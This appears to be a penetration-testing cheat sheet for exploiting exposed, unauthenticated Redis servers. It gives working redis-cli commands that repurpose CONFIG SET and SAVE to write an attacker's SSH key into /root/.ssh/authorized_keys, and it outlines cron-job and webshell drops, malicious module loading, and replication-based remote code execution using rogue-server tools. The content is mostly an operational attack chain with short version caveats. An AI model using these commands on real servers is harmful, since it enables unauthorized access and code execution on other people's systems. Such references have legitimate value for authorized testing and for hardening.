Redis (port 6379) ships with no authentication and, historically, bound to all interfaces, so an exposed instance is often an unauthenticated foothold. Its real danger is that CONFIG SET lets a client choose where the database file is written, which turns Redis into an arbitrary-file-write primitive, and from there into code execution.
Access#
redis-cli -h <target> # connect; INFO and KEYS * if no auth
redis-cli -h <target> -a <pass> # where requirepass is set (crack weak ones)
File-write to code execution#
Point the RDB file at a sensitive location and write a payload as a key value. On current Redis the runtime CONFIG SET of dir/dbfilename is blocked unless the server was started with enable-protected-configs yes, so this is primarily an older-server or misconfigured-server technique:
# SSH: write an authorized_keys file into a user's .ssh
redis-cli -h <target> config set dir /root/.ssh/
redis-cli -h <target> config set dbfilename authorized_keys
redis-cli -h <target> set k "$(printf '\n\n%s\n\n' "$(cat id_rsa.pub)")"
redis-cli -h <target> save
# Cron: write a job into /var/spool/cron (Linux) for a callback
# Web: write a webshell into a served directory when Redis and the web root share a host
Module load and replication RCE#
# Load a malicious module for direct command execution (Redis 4.0+;
# current servers require enable-module-command yes at startup for MODULE LOAD)
redis-cli -h <target> module load /path/to/exp.so
# Replication RCE: make the target a replica of an attacker "master" that ships a module
# tools: redis-rogue-server / RedisModules-ExecuteCommand
Exploitation notes#
- Unauthenticated Redis exposed to the network is the headline: no credential needed before the file-write chain.
- The authorized_keys and cron drops depend on the Redis service account's privileges (root Redis is the jackpot) and on the directory being writable.
- Module load and replication RCE are the cleanest paths where module loading is permitted (
enable-module-command yes), giving direct command execution without relying on a writable.sshor cron. protected-mode(default on since 3.2 when no bind/password is set) blocks many of these from remote, so confirm it is off or bypassed.
Tools#
- redis-cli: native client for
CONFIG SET,MODULE LOAD, and the file-write chain. - redis-rogue-server: replication-based module RCE against Redis 4.0+.
- nmap
redis-info: unauthenticated fingerprinting.